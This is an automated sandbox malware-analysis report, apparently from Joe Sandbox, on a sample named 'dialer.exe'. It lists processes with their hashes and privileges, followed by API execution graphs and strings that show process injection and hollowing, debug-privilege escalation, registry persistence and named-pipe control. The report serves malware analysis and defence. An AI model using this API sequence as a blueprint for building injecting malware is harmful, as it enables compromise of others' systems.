                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:33
                                              Start time:18:24:45
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:34
                                              Start time:18:24:45
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:35
                                              Start time:18:24:46
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:36
                                              Start time:18:24:46
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:37
                                              Start time:18:24:47
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:38
                                              Start time:18:24:47
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:39
                                              Start time:18:24:47
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:40
                                              Start time:18:24:48
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:41
                                              Start time:18:24:49
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:42
                                              Start time:18:24:50
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:43
                                              Start time:18:24:50
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:44
                                              Start time:18:24:50
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:45
                                              Start time:18:24:51
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:46
                                              Start time:18:24:52
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:47
                                              Start time:18:24:53
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\spoolsv.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\spoolsv.exe
                                              Imagebase:0x7ff630670000
                                              File size:842'752 bytes
                                              MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:48
                                              Start time:18:24:53
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Reset < >
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1417263002.00007FF752A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF752A40000, based on PE: true
                                                • Associated: 00000000.00000002.1417188725.00007FF752A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1417315153.00007FF752A5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1417375531.00007FF752A80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1418832854.00007FF752FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1418994933.00007FF752FEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1419054510.00007FF752FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1419161633.00007FF752FFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1419292507.00007FF752FFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff752a40000_h2qWqtD73F.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 01a59060b9db2a427f38197d6d8fc1317a4e77fd9c2963c7075b2de803b932c0
                                                • Instruction ID: 42dcef018eb2997d6a2475997241fe23b10728cbc6c6749d93db4b42f330cdb9
                                                • Opcode Fuzzy Hash: 01a59060b9db2a427f38197d6d8fc1317a4e77fd9c2963c7075b2de803b932c0
                                                • Instruction Fuzzy Hash: 4BB0922490420584E3003B45AC41298A260AB04780F944020C80C02392CAAE90418B70

                                                Execution Graph

                                                Execution Coverage:47.4%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:64.3%
                                                Total number of Nodes:230
                                                Total number of Limit Nodes:26
                                                execution_graph 406 7ff67e6c2cc0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 407 7ff67e6c2d16 K32EnumProcesses 406->407 408 7ff67e6c2d76 Sleep 407->408 410 7ff67e6c2d2b 407->410 408->407 409 7ff67e6c2d64 409->408 410->409 412 7ff67e6c26c8 410->412 413 7ff67e6c26e0 412->413 414 7ff67e6c26d5 412->414 413->410 416 7ff67e6c10c0 414->416 454 7ff67e6c19ac OpenProcess 416->454 419 7ff67e6c14c5 419->413 420 7ff67e6c1122 OpenProcess 420->419 421 7ff67e6c113e OpenProcess 420->421 422 7ff67e6c1161 K32GetModuleFileNameExW 421->422 423 7ff67e6c1208 NtQueryInformationProcess 421->423 424 7ff67e6c11aa CloseHandle 422->424 425 7ff67e6c117a PathFindFileNameW lstrlenW 422->425 426 7ff67e6c122f 423->426 427 7ff67e6c14bc CloseHandle 423->427 424->423 429 7ff67e6c11b8 424->429 425->424 428 7ff67e6c1197 StrCpyW 425->428 426->427 430 7ff67e6c123b OpenProcessToken 426->430 427->419 428->424 429->423 431 7ff67e6c11e3 StrCmpIW 429->431 430->427 432 7ff67e6c1259 GetTokenInformation 430->432 431->427 431->429 433 7ff67e6c1281 GetLastError 432->433 434 7ff67e6c12fc 432->434 433->434 436 7ff67e6c128c LocalAlloc 433->436 435 7ff67e6c1303 CloseHandle 434->435 435->427 441 7ff67e6c1317 435->441 436->434 437 7ff67e6c12a2 GetTokenInformation 436->437 438 7ff67e6c12ea 437->438 439 7ff67e6c12ca GetSidSubAuthorityCount GetSidSubAuthority 437->439 440 7ff67e6c12f1 LocalFree 438->440 439->440 440->435 441->427 442 7ff67e6c13a6 StrStrA 441->442 443 7ff67e6c13ce 441->443 442->441 444 7ff67e6c13d3 442->444 443->427 444->427 445 7ff67e6c13fe VirtualAllocEx 444->445 445->427 446 7ff67e6c142b WriteProcessMemory 445->446 446->427 447 7ff67e6c1446 446->447 459 7ff67e6c18f8 447->459 449 7ff67e6c1466 449->427 450 7ff67e6c1483 WaitForSingleObject 449->450 453 7ff67e6c147c CloseHandle 449->453 452 7ff67e6c1492 GetExitCodeThread 450->452 450->453 452->453 453->427 455 7ff67e6c110e 454->455 456 7ff67e6c19d8 IsWow64Process 454->456 455->419 455->420 457 7ff67e6c19f8 CloseHandle 456->457 458 7ff67e6c19ea 456->458 457->455 458->457 462 7ff67e6c1a14 GetModuleHandleA 459->462 463 7ff67e6c1a34 GetProcAddress 462->463 464 7ff67e6c1914 462->464 463->464 465 7ff67e6c2314 468 7ff67e6c2328 465->468 493 7ff67e6c2078 468->493 472 7ff67e6c2078 14 API calls 473 7ff67e6c23de GetCurrentProcessId OpenProcess 472->473 474 7ff67e6c2400 OpenProcessToken 473->474 475 7ff67e6c2486 FindResourceExA 473->475 476 7ff67e6c2419 LookupPrivilegeValueW 474->476 477 7ff67e6c247d CloseHandle 474->477 478 7ff67e6c24a6 SizeofResource 475->478 479 7ff67e6c231d ExitProcess 475->479 476->477 480 7ff67e6c2433 AdjustTokenPrivileges 476->480 477->475 478->479 481 7ff67e6c24bf LoadResource 478->481 480->477 482 7ff67e6c2477 GetLastError 480->482 481->479 483 7ff67e6c24d3 LockResource GetCurrentProcessId 481->483 482->477 510 7ff67e6c17f8 GetProcessHeap HeapAlloc 483->510 485 7ff67e6c24f0 RegCreateKeyExW 486 7ff67e6c2532 ConvertStringSecurityDescriptorToSecurityDescriptorW 485->486 487 7ff67e6c260d CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 485->487 489 7ff67e6c2587 RegCreateKeyExW 486->489 490 7ff67e6c2566 RegSetKeySecurity LocalFree 486->490 488 7ff67e6c2693 SleepEx 487->488 488->488 491 7ff67e6c25c3 GetCurrentProcessId RegSetValueExW RegCloseKey 489->491 492 7ff67e6c2602 RegCloseKey 489->492 490->489 491->492 492->487 494 7ff67e6c2081 StrCpyW StrCatW GetModuleHandleW 493->494 495 7ff67e6c2270 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 493->495 494->495 496 7ff67e6c20d3 GetCurrentProcess K32GetModuleInformation 494->496 495->472 498 7ff67e6c212e CreateFileW 496->498 499 7ff67e6c2267 FreeLibrary 496->499 498->499 500 7ff67e6c2163 CreateFileMappingW 498->500 499->495 501 7ff67e6c225e CloseHandle 500->501 502 7ff67e6c218d MapViewOfFile 500->502 501->499 503 7ff67e6c21b1 502->503 504 7ff67e6c2255 CloseHandle 502->504 503->504 505 7ff67e6c21cc lstrcmpiA 503->505 508 7ff67e6c21fd 503->508 504->501 505->503 506 7ff67e6c21ff VirtualProtect 505->506 516 7ff67e6c18b8 506->516 508->504 518 7ff67e6c14e4 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 510->518 512 7ff67e6c1891 GetProcessHeap HeapFree 513 7ff67e6c183c 513->512 514 7ff67e6c185d OpenProcess 513->514 514->513 515 7ff67e6c1873 TerminateProcess CloseHandle 514->515 515->513 517 7ff67e6c18c7 VirtualProtect 516->517 517->504 519 7ff67e6c1571 518->519 520 7ff67e6c163b GetProcessHeap HeapFree GetProcessHeap HeapFree 518->520 519->520 521 7ff67e6c1586 OpenProcess 519->521 523 7ff67e6c1626 CloseHandle 519->523 524 7ff67e6c15d5 ReadProcessMemory 519->524 520->513 521->519 522 7ff67e6c15a3 K32EnumProcessModules 521->522 522->519 522->523 523->519 524->519 525 7ff67e6c2d84 527 7ff67e6c2d91 525->527 528 7ff67e6c2db1 ConnectNamedPipe 527->528 529 7ff67e6c2da6 Sleep 527->529 536 7ff67e6c1c64 AllocateAndInitializeSid 527->536 530 7ff67e6c2dc0 ReadFile 528->530 531 7ff67e6c2e0f Sleep 528->531 529->527 532 7ff67e6c2de3 530->532 533 7ff67e6c2e1a DisconnectNamedPipe 530->533 531->533 544 7ff67e6c26ac 532->544 533->528 537 7ff67e6c1cc1 SetEntriesInAclW 536->537 538 7ff67e6c1d9c 536->538 537->538 540 7ff67e6c1d1e LocalAlloc 537->540 538->527 540->538 541 7ff67e6c1d32 InitializeSecurityDescriptor 540->541 541->538 542 7ff67e6c1d44 SetSecurityDescriptorDacl 541->542 542->538 543 7ff67e6c1d5c CreateNamedPipeW 542->543 543->538 545 7ff67e6c26c1 WriteFile 544->545 546 7ff67e6c26b9 544->546 545->533 547 7ff67e6c10c0 30 API calls 546->547 547->545 557 7ff67e6c26e8 558 7ff67e6c28be 557->558 559 7ff67e6c2716 557->559 562 7ff67e6c28cc 558->562 563 7ff67e6c2b0a ReadFile 558->563 560 7ff67e6c271c 559->560 561 7ff67e6c284a GetProcessHeap HeapAlloc K32EnumProcesses 559->561 565 7ff67e6c2841 ExitProcess 560->565 566 7ff67e6c2729 560->566 569 7ff67e6c2888 561->569 614 7ff67e6c27b7 561->614 567 7ff67e6c2b00 562->567 568 7ff67e6c28d5 562->568 564 7ff67e6c2b34 563->564 563->614 576 7ff67e6c19ac 3 API calls 564->576 564->614 570 7ff67e6c27e4 RegOpenKeyExW 566->570 571 7ff67e6c2732 566->571 574 7ff67e6c1768 22 API calls 567->574 572 7ff67e6c28e0 568->572 573 7ff67e6c2aa5 568->573 575 7ff67e6c10c0 30 API calls 569->575 569->614 577 7ff67e6c2811 RegDeleteValueW 570->577 578 7ff67e6c2825 570->578 588 7ff67e6c274f ReadFile 571->588 571->614 580 7ff67e6c2921 572->580 581 7ff67e6c28e5 572->581 579 7ff67e6c1a44 ReadFile 573->579 574->614 575->569 582 7ff67e6c2b53 576->582 577->578 627 7ff67e6c1ac4 SysAllocString SysAllocString CoInitializeEx 578->627 584 7ff67e6c2ab4 579->584 643 7ff67e6c1a44 580->643 581->614 640 7ff67e6c1958 581->640 591 7ff67e6c2b67 GetProcessHeap HeapAlloc 582->591 582->614 616 7ff67e6c27bc 582->616 594 7ff67e6c1a44 ReadFile 584->594 584->614 587 7ff67e6c282a 635 7ff67e6c1768 GetProcessHeap HeapAlloc 587->635 593 7ff67e6c2779 588->593 588->614 590 7ff67e6c2938 ReadFile 596 7ff67e6c2960 590->596 590->614 597 7ff67e6c14e4 13 API calls 591->597 604 7ff67e6c19ac 3 API calls 593->604 593->614 599 7ff67e6c2acb 594->599 601 7ff67e6c296d GetProcessHeap HeapAlloc ReadFile 596->601 596->614 619 7ff67e6c2ba0 597->619 605 7ff67e6c2ad3 ShellExecuteW 599->605 599->614 607 7ff67e6c29b1 601->607 608 7ff67e6c2a97 GetProcessHeap 601->608 602 7ff67e6c2c18 4 API calls 602->614 611 7ff67e6c2798 604->611 605->614 607->608 617 7ff67e6c2a05 lstrlenW GetProcessHeap HeapAlloc 607->617 618 7ff67e6c29e2 607->618 612 7ff67e6c2bde HeapFree 608->612 609 7ff67e6c2bd5 GetProcessHeap 609->612 611->614 615 7ff67e6c27a8 611->615 611->616 612->614 620 7ff67e6c10c0 30 API calls 615->620 616->602 624 7ff67e6c2a49 617->624 618->608 647 7ff67e6c1db4 618->647 619->609 667 7ff67e6c16d8 619->667 620->614 661 7ff67e6c2c18 CreateFileW 624->661 628 7ff67e6c1c35 SysFreeString SysFreeString 627->628 629 7ff67e6c1b16 CoInitializeSecurity 627->629 628->587 630 7ff67e6c1b5e CoCreateInstance 629->630 631 7ff67e6c1b52 629->631 632 7ff67e6c1c2f CoUninitialize 630->632 633 7ff67e6c1b92 VariantInit 630->633 631->630 631->632 632->628 634 7ff67e6c1be8 633->634 634->632 636 7ff67e6c14e4 13 API calls 635->636 638 7ff67e6c17a6 636->638 637 7ff67e6c17d4 GetProcessHeap HeapFree 638->637 639 7ff67e6c16d8 5 API calls 638->639 639->638 641 7ff67e6c1a14 2 API calls 640->641 642 7ff67e6c196d 641->642 644 7ff67e6c1a68 ReadFile 643->644 645 7ff67e6c1aa5 644->645 646 7ff67e6c1a8b 644->646 645->590 645->614 646->644 646->645 657 7ff67e6c1de0 647->657 648 7ff67e6c1fb8 648->608 649 7ff67e6c1e3e CreateProcessW 650 7ff67e6c1e86 VirtualAllocEx 649->650 649->657 651 7ff67e6c1eb9 WriteProcessMemory 650->651 650->657 651->657 652 7ff67e6c1fc4 OpenProcess 653 7ff67e6c1fd7 TerminateProcess 652->653 652->657 653->657 654 7ff67e6c1f2a VirtualAlloc 656 7ff67e6c1f49 GetThreadContext 654->656 654->657 655 7ff67e6c1ee4 WriteProcessMemory 655->657 656->657 658 7ff67e6c1f61 WriteProcessMemory 656->658 657->648 657->649 657->652 657->654 657->655 658->657 659 7ff67e6c1f89 SetThreadContext 658->659 659->657 660 7ff67e6c1fa9 ResumeThread 659->660 660->648 660->657 662 7ff67e6c2c62 WriteFile 661->662 663 7ff67e6c2a83 GetProcessHeap HeapFree 661->663 664 7ff67e6c2ca4 CloseHandle 662->664 665 7ff67e6c2c86 662->665 663->608 664->663 665->664 666 7ff67e6c2c8a WriteFile 665->666 666->664 668 7ff67e6c1751 667->668 669 7ff67e6c16f7 OpenProcess 667->669 668->609 669->668 670 7ff67e6c170f 669->670 671 7ff67e6c18f8 2 API calls 670->671 672 7ff67e6c172f 671->672 673 7ff67e6c1748 CloseHandle 672->673 674 7ff67e6c173d CloseHandle 672->674 673->668 674->673 548 7ff67e6c228c 549 7ff67e6c2299 548->549 550 7ff67e6c1c64 6 API calls 549->550 551 7ff67e6c22ae Sleep 549->551 552 7ff67e6c22b9 ConnectNamedPipe 549->552 550->549 551->549 553 7ff67e6c22c8 ReadFile 552->553 554 7ff67e6c22fd Sleep 552->554 555 7ff67e6c2308 DisconnectNamedPipe 553->555 556 7ff67e6c22eb 553->556 554->555 555->552 556->555

                                                Callgraph

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: CreateProcess$Close$CurrentHandleResource$ConditionFileMaskSecurityThread$DescriptorFreeHeapModuleOpenTokenValue$AdjustAllocConvertErrorFindInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringVerifyVersionViewlstrcmpi
                                                • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                • API String ID: 2439791646-1130149537
                                                • Opcode ID: 64f5cfc841401fc1be0d0af11d06bbf6443494d40dab24e71934df2300a70ca7
                                                • Instruction ID: d588b291bba05f019bf18310c3870a470bb231d733935339c60d5eba6699a72b
                                                • Opcode Fuzzy Hash: 64f5cfc841401fc1be0d0af11d06bbf6443494d40dab24e71934df2300a70ca7
                                                • Instruction Fuzzy Hash: D7A1EB37B69B8286EB209F21E8542AA73A1FB98754F404235E94D87B74DF3CE14DD700

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 26 7ff67e6c10c0-7ff67e6c1110 call 7ff67e6c19ac 29 7ff67e6c14c5-7ff67e6c14e1 26->29 30 7ff67e6c1116-7ff67e6c111c 26->30 30->29 31 7ff67e6c1122-7ff67e6c1138 OpenProcess 30->31 31->29 32 7ff67e6c113e-7ff67e6c115b OpenProcess 31->32 33 7ff67e6c1161-7ff67e6c1178 K32GetModuleFileNameExW 32->33 34 7ff67e6c1208-7ff67e6c1229 NtQueryInformationProcess 32->34 35 7ff67e6c11aa-7ff67e6c11b6 CloseHandle 33->35 36 7ff67e6c117a-7ff67e6c1195 PathFindFileNameW lstrlenW 33->36 37 7ff67e6c122f-7ff67e6c1235 34->37 38 7ff67e6c14bc-7ff67e6c14bf CloseHandle 34->38 35->34 40 7ff67e6c11b8-7ff67e6c11df 35->40 36->35 39 7ff67e6c1197-7ff67e6c11a7 StrCpyW 36->39 37->38 41 7ff67e6c123b-7ff67e6c1253 OpenProcessToken 37->41 38->29 39->35 42 7ff67e6c11e3-7ff67e6c11f5 StrCmpIW 40->42 41->38 43 7ff67e6c1259-7ff67e6c127f GetTokenInformation 41->43 42->38 44 7ff67e6c11fb-7ff67e6c1206 42->44 45 7ff67e6c1281-7ff67e6c128a GetLastError 43->45 46 7ff67e6c12fc 43->46 44->34 44->42 45->46 48 7ff67e6c128c-7ff67e6c12a0 LocalAlloc 45->48 47 7ff67e6c1303-7ff67e6c1311 CloseHandle 46->47 47->38 49 7ff67e6c1317-7ff67e6c131e 47->49 48->46 50 7ff67e6c12a2-7ff67e6c12c8 GetTokenInformation 48->50 49->38 53 7ff67e6c1324-7ff67e6c132f 49->53 51 7ff67e6c12ea 50->51 52 7ff67e6c12ca-7ff67e6c12e8 GetSidSubAuthorityCount GetSidSubAuthority 50->52 54 7ff67e6c12f1-7ff67e6c12fa LocalFree 51->54 52->54 53->38 55 7ff67e6c1335-7ff67e6c133f 53->55 54->47 55->38 56 7ff67e6c1345-7ff67e6c134f 55->56 56->38 57 7ff67e6c1355-7ff67e6c1395 call 7ff67e6c2010 * 3 56->57 57->38 64 7ff67e6c139b-7ff67e6c13bb call 7ff67e6c2010 StrStrA 57->64 67 7ff67e6c13d3-7ff67e6c13f8 call 7ff67e6c2010 * 2 64->67 68 7ff67e6c13bd-7ff67e6c13cc 64->68 67->38 74 7ff67e6c13fe-7ff67e6c1425 VirtualAllocEx 67->74 68->64 69 7ff67e6c13ce 68->69 69->38 74->38 75 7ff67e6c142b-7ff67e6c1444 WriteProcessMemory 74->75 75->38 76 7ff67e6c1446-7ff67e6c1468 call 7ff67e6c18f8 75->76 76->38 79 7ff67e6c146a-7ff67e6c1472 76->79 79->38 80 7ff67e6c1474-7ff67e6c147a 79->80 81 7ff67e6c1483-7ff67e6c1490 WaitForSingleObject 80->81 82 7ff67e6c147c-7ff67e6c1481 80->82 84 7ff67e6c14b1 81->84 85 7ff67e6c1492-7ff67e6c14a6 GetExitCodeThread 81->85 83 7ff67e6c14b6 CloseHandle 82->83 83->38 84->83 85->84 86 7ff67e6c14a8-7ff67e6c14ae 85->86 86->84
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                • String ID: @$MSBuild.exe$ReflectiveDllMain$WmiPrvSE.exe$dialer.exe
                                                • API String ID: 2561231171-2835194517
                                                • Opcode ID: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
                                                • Instruction ID: fe5e2650a922e03053a58b6ee9fe528b941c4256cf5603b33cbd0bdd81d271d7
                                                • Opcode Fuzzy Hash: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
                                                • Instruction Fuzzy Hash: 63B13E77B28A4286EF209F11A8546BA37A5FF64B84F004235EA4E87764DF3CF549E740

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                • String ID:
                                                • API String ID: 4084875642-0
                                                • Opcode ID: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                                • Instruction ID: 0f77232f7ec49973beb31a3ec46086c3c8236b4e604b77b7c1396d6c1833097e
                                                • Opcode Fuzzy Hash: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                                • Instruction Fuzzy Hash: 5451B373B256828AEF60CF62D8586AA32A0FB59B84F444135EE4D87764DF3CE44AD700

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
